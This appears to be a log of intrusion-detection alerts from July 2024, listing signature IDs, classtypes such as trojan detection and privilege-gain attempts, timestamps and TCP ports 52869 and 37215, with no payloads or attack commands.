                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.734892
                      SID:2027339
                      Source Port:53532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.084912
                      SID:2027339
                      Source Port:43190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.664378
                      SID:2835222
                      Source Port:38972
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.065904
                      SID:2835222
                      Source Port:50988
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.102253
                      SID:2027339
                      Source Port:50806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.088778
                      SID:2835222
                      Source Port:55086
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:45.315463
                      SID:2025132
                      Source Port:34882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.458812
                      SID:2831300
                      Source Port:57112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:24.491533
                      SID:2831300
                      Source Port:39374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.706860
                      SID:2025132
                      Source Port:35324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.221844
                      SID:2829579
                      Source Port:45788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.433337
                      SID:2027339
                      Source Port:53838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.324002
                      SID:2027339
                      Source Port:49108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.167111
                      SID:2025132
                      Source Port:37666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:31.001861
                      SID:2027339
                      Source Port:50918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.251571
                      SID:2831300
                      Source Port:35252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.944157
                      SID:2835222
                      Source Port:39064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.176981
                      SID:2027339
                      Source Port:40288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.423413
                      SID:2027339
                      Source Port:60260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.686896
                      SID:2025132
                      Source Port:46434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.057513
                      SID:2831300
                      Source Port:36628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.277107
                      SID:2027339
                      Source Port:56096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.461168
                      SID:2831300
                      Source Port:51056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.677656
                      SID:2829579
                      Source Port:36154
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.453658
                      SID:2831300
                      Source Port:53192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.859779
                      SID:2829579
                      Source Port:56582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.543985
                      SID:2027339
                      Source Port:55796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:47.118980
                      SID:2831300
                      Source Port:43388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:35.260557
                      SID:2025132
                      Source Port:50038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.515827
                      SID:2831300
                      Source Port:51292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.983376
                      SID:2027339
                      Source Port:53304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.464785
                      SID:2025132
                      Source Port:40292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.788274
                      SID:2835222
                      Source Port:46942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.085078
                      SID:2025132
                      Source Port:57172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.278742
                      SID:2025132
                      Source Port:43646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.861533
                      SID:2027339
                      Source Port:49538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.331312
                      SID:2831300
                      Source Port:57970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.170266
                      SID:2831300
                      Source Port:60928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.444876
                      SID:2027339
                      Source Port:57792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.632782
                      SID:2025132
                      Source Port:60022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.986039
                      SID:2027339
                      Source Port:58534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.231390
                      SID:2025132
                      Source Port:33526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.328595
                      SID:2831300
                      Source Port:60116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.179441
                      SID:2831300
                      Source Port:33046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:50.079146
                      SID:2025132
                      Source Port:56612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.171136
                      SID:2831300
                      Source Port:57692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.219202
                      SID:2027339
                      Source Port:35916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.651872
                      SID:2027339
                      Source Port:45112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.623995
                      SID:2025132
                      Source Port:46778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.338927
                      SID:2829579
                      Source Port:43252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.625834
                      SID:2831300
                      Source Port:37068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.542495
                      SID:2027339
                      Source Port:36312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.348098
                      SID:2027339
                      Source Port:45364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.607039
                      SID:2027339
                      Source Port:48702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.424977
                      SID:2829579
                      Source Port:58474
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.913786
                      SID:2831300
                      Source Port:57222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.177522
                      SID:2027339
                      Source Port:60230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.453720
                      SID:2831300
                      Source Port:37298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.662485
                      SID:2835222
                      Source Port:53578
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:37.315997
                      SID:2025132
                      Source Port:59550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.120793
                      SID:2829579
                      Source Port:53676
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.793654
                      SID:2027339
                      Source Port:56948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.679529
                      SID:2831300
                      Source Port:56026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.402930
                      SID:2829579
                      Source Port:39030
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:01.438133
                      SID:2027339
                      Source Port:37850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.317926
                      SID:2027339
                      Source Port:38524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.316014
                      SID:2025132
                      Source Port:56188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.309801
                      SID:2831300
                      Source Port:36450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.727506
                      SID:2027339
                      Source Port:52272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859349
                      SID:2835222
                      Source Port:43164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.236923
                      SID:2027339
                      Source Port:36496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:51.240850
                      SID:2025132
                      Source Port:35524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.896425
                      SID:2027339
                      Source Port:53982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:37.456862
                      SID:2025132
                      Source Port:39818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.756259
                      SID:2835222
                      Source Port:57816
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.512424
                      SID:2027339
                      Source Port:38240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.214826
                      SID:2831300
                      Source Port:48252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.953935
                      SID:2025132
                      Source Port:54078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.498027
                      SID:2829579
                      Source Port:55076
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:56.793781
                      SID:2831300
                      Source Port:47618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.538181
                      SID:2025132
                      Source Port:39512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.855214
                      SID:2027339
                      Source Port:52872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.829267
                      SID:2831300
                      Source Port:59078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.535101
                      SID:2027339
                      Source Port:34958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.153687
                      SID:2025132
                      Source Port:54446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.453008
                      SID:2027339
                      Source Port:35574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:56.793781
                      SID:2831300
                      Source Port:57122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.579965
                      SID:2025132
                      Source Port:37300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.763636
                      SID:2831300
                      Source Port:35418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.445623
                      SID:2831300
                      Source Port:41504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.716925
                      SID:2027339
                      Source Port:47724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.176965
                      SID:2835222
                      Source Port:35526
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.953100
                      SID:2025132
                      Source Port:40660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.527430
                      SID:2027339
                      Source Port:52956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.535181
                      SID:2025132
                      Source Port:50338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.805358
                      SID:2027339
                      Source Port:56234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.539924
                      SID:2835222
                      Source Port:60248
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.147952
                      SID:2027339
                      Source Port:57304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.426771
                      SID:2027339
                      Source Port:38422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.705397
                      SID:2025132
                      Source Port:56898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.809666
                      SID:2025132
                      Source Port:58670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.468265
                      SID:2831300
                      Source Port:41688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:17.863423
                      SID:2027339
                      Source Port:35272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245742
                      SID:2829579
                      Source Port:38894
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.022964
                      SID:2829579
                      Source Port:60156
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.512491
                      SID:2831300
                      Source Port:52940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.214861
                      SID:2835222
                      Source Port:58786
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.656192
                      SID:2835222
                      Source Port:42462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.542288
                      SID:2831300
                      Source Port:35832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.979608
                      SID:2027339
                      Source Port:36636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.676865
                      SID:2831300
                      Source Port:36380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.538013
                      SID:2027339
                      Source Port:33824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323648
                      SID:2829579
                      Source Port:52592
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.153640
                      SID:2025132
                      Source Port:33060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.419849
                      SID:2835222
                      Source Port:49168
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.468009
                      SID:2829579
                      Source Port:50290
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.486123
                      SID:2027339
                      Source Port:59964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.182231
                      SID:2027339
                      Source Port:44202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.471777
                      SID:2831300
                      Source Port:35422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.456840
                      SID:2831300
                      Source Port:41782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.344189
                      SID:2027339
                      Source Port:50530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.672304
                      SID:2835222
                      Source Port:60762
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.287042
                      SID:2027339
                      Source Port:49740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.384402
                      SID:2831300
                      Source Port:36768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.493636
                      SID:2027339
                      Source Port:52986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.736535
                      SID:2025132
                      Source Port:39368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.635185
                      SID:2027339
                      Source Port:43246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.377377
                      SID:2027339
                      Source Port:41718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.143736
                      SID:2027339
                      Source Port:33942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.633204
                      SID:2831300
                      Source Port:50604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.382234
                      SID:2027339
                      Source Port:51536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.565815
                      SID:2027339
                      Source Port:37314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.296284
                      SID:2027339
                      Source Port:41576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.022964
                      SID:2835222
                      Source Port:52448
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.483885
                      SID:2831300
                      Source Port:35874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:55.877930
                      SID:2829579
                      Source Port:38846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.572173
                      SID:2831300
                      Source Port:59390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:53.637724
                      SID:2027339
                      Source Port:59854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.333295
                      SID:2025132
                      Source Port:32952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:18.501276
                      SID:2025132
                      Source Port:42268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.251198
                      SID:2831300
                      Source Port:40012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.216294
                      SID:2831300
                      Source Port:52258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.978005
                      SID:2027339
                      Source Port:56764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.226653
                      SID:2025132
                      Source Port:49798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.218209
                      SID:2027339
                      Source Port:56434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.533759
                      SID:2829579
                      Source Port:55014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.947146
                      SID:2025132
                      Source Port:50066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.374971
                      SID:2831300
                      Source Port:41830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.652423
                      SID:2835222
                      Source Port:47510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.113321
                      SID:2829579
                      Source Port:54880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.159948
                      SID:2829579
                      Source Port:51312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:31.457622
                      SID:2025132
                      Source Port:55076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.983376
                      SID:2831300
                      Source Port:41334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:31.663530
                      SID:2027339
                      Source Port:60448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.272029
                      SID:2027339
                      Source Port:52522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.293090
                      SID:2025132
                      Source Port:48200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.198650
                      SID:2025132
                      Source Port:47354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.344189
                      SID:2027339
                      Source Port:58436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.094268
                      SID:2831300
                      Source Port:47022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.095402
                      SID:2025132
                      Source Port:47760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.459218
                      SID:2027339
                      Source Port:47800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.086216
                      SID:2835222
                      Source Port:34976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.475548
                      SID:2831300
                      Source Port:46508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.956391
                      SID:2829579
                      Source Port:41846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.224112
                      SID:2025132
                      Source Port:55408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.638173
                      SID:2027339
                      Source Port:59770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.910350
                      SID:2027339
                      Source Port:38290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.471230
                      SID:2025132
                      Source Port:41426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:53.435475
                      SID:2027339
                      Source Port:49526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:22.982491
                      SID:2027339
                      Source Port:52202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327720
                      SID:2829579
                      Source Port:42976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.275713
                      SID:2025132
                      Source Port:41068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.392755
                      SID:2829579
                      Source Port:41840
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.832966
                      SID:2027339
                      Source Port:44326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.067283
                      SID:2831300
                      Source Port:51144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.034671
                      SID:2025132
                      Source Port:59160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:18.158860
                      SID:2831300
                      Source Port:48954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.556801
                      SID:2831300
                      Source Port:45742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:38.250934
                      SID:2027339
                      Source Port:50794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
